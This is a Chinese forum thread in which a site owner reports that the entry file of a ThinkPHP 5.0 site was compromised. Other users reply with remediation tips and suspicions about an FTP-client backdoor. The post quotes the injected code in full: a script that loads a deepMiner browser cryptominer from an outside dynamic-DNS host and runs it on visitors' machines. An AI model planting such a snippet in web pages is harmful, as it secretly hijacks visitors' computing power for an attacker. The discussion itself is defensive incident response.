为了账号安全,请及时绑定邮箱和手机立即绑定

服务器又被入侵

首页 猿问 服务器又被入侵

服务器又被入侵

PHP
牛魔王的故事 2019-03-07 05:02:11
使用 tp5.0 框架的入口文件被人写入不知道啥玩意的东西 求大佬!!! 阿里云服务器 wdlinux 系统 echo "<script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script> <script> var uri = 'www'; var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5}); if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) { jqueryui.start(); } </script>";
查看完整描述

11 回答

?
Cats萌萌

TA贡献1805条经验 获得超9个赞

先找一找是哪里出现的漏洞,注入啊!文件包含啊! 然后看一下文件的权限

查看完整回答
反对 回复 2019-03-18
?
慕沐林林

TA贡献2016条经验 获得超9个赞

先修改文件属性,比如说把owner变成root:root

查看完整回答
反对 回复 2019-03-18
?
缥缈止盈

TA贡献2041条经验 获得超4个赞

先把日志搂出来审计一遍

查看完整回答
反对 回复 2019-03-18
?
慕斯王

TA贡献1864条经验 获得超2个赞

最近留意到几次这样的入侵
请问楼主服务器上是否安装了 FTP ?
电脑上使用的 FTP 客户端是?
我怀疑是 FTP 客户端上的后门

查看完整回答
反对 回复 2019-03-18
?
江户川乱折腾

TA贡献1851条经验 获得超5个赞

如果这代码是入侵者留下的,可以告诉你,你的每一个用户在帮他挖矿。

查看完整回答
反对 回复 2019-03-18
?
温温酱

TA贡献1752条经验 获得超4个赞

楼主,我的也中招了!
不是用TP的。
但是也是使用wdcp这个来搭的。
也是直接在我的程序入口处加了你贴出的那段代码。
查也查不到头绪。不知道是从哪里黑进来的。

查看完整回答
反对 回复 2019-03-18
?
斯蒂芬大帝

TA贡献1827条经验 获得超8个赞

你是是什么网站系统呀,用什么服务器呀,最近好多人都被入侵了呢。

查看完整回答
反对 回复 2019-03-18
  • 11 回答
  • 0 关注
  • 571 浏览

添加回答

了解更多

举报

0/150
提交
取消
意见反馈 帮助中心 APP下载
官方微信